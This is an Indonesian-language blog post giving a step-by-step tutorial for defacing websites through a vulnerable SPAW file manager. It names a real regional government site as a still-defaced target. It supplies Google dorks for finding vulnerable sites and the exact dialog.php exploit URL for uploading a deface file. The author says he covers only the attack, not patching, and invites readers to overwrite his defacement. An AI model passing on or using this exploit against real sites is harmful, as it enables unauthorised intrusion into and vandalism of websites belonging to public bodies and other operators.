Defacing dengan Menggunakan SPAW file manager

Kali ini kita bahas tentang vulnerability lagi yuk. Deface yang sekarang kita bahas adalah SPAW File manager, mungkin sama seperti webdav dan Web Kindeditor, saya kira
okay setelah saya keliling keliling malah ternyata webstite kota Bandung yang berdomain www.bandungkab.go.id mempunyai kelemahan yang kita bahas sekarang ini
bisa dilihat saat saya mencoba dork

 inurl:”spaw2/uploads/files/” site:id
website  www.bandungkab.go.id ada dan dalam keadaan masih ter-deface!. Woow brarti keamanan cyber indonesia mudah tertembus ya?



okay berhubung saya bukan ahli patch website jadi saya hanya akan membagi cara mendefacenya saja ya :)

pertama seperti biasa kita harus membuka browser kita
kedua mari kita buka google dan masukkan Dork ini bisa anda manipulasi sendiri

 inurl:”spaw2/uploads/files/” site:com
nb:"site:com" bisa anda ganti dengan "intext:hacked" atau semau anda, It's Up To You 
ketiga kita masukkan expoits berikut kedalam website
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file
contoh: www.target.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file 
keempat, jika web tersebut vulnerable dan kalian beruntung maka tampilannya akan seperti ini
pada Image tinggal diganti dengan file dan pilih file deface kalian lalu klik upload.
jika berhasil maka file anda akan berada disana dan jika anda ingin melihatnya tinggal klik download file
tenang saja, karena dia akan membawa anda ke new tab
masalah selesai,
mudah bukan?
web target yang saya gunakan
jika ingin ditumpuk atau di hapus silahkan yang penting saya sudah berbagi dengan sobat

============================================================
Sumber : http://satria-wiguna.blogspot.com
============================================================
Previous
Next Post »
Thanks for your comment